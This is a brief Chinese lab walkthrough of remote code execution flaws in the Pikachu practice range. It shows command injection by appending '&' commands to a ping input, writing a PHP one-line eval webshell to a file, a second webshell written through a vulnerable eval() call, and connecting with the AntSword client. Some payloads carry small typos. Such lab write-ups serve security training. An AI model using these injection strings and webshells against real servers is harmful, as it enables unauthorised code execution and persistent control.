Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
万象观察录9 分钟前
微服务架构下的API全生命周期安全防护办法
安全·微服务·架构
yunwei3721 分钟前
ACRFence:防止 AI Agent 检查点恢复中的语义回滚攻击
人工智能·安全·架构
keyipatience28 分钟前
IP网络层
服务器·网络·网络协议·ubuntu·http
湫默35 分钟前
运维八股文
运维
Discipline~Hai37 分钟前
Linux网络编程03-HTTP协议
linux·运维·服务器·网络·网络协议·http·linux网络编程
秋名RG38 分钟前
Java 泛型深度解析:从类型安全到现代实践(JDK 21 视角)
java·windows·安全
CV-杨帆40 分钟前
在自己的服务器上搭建VLLM 以Qwen3.5-0.8B与Qwen3.5-4B为模型基础
运维·服务器·vllm
程序猿乐锅1 小时前
【计算机组成原理 | 第八章】I/O系统
运维·服务器·网络
青瓦梦滋1 小时前
Linux高级IO
linux·运维·服务器·网络·网络协议·tcp/ip
꯭自꯭闭꯭1 小时前
达梦(DM8)安装测试
linux·运维·服务器·数据库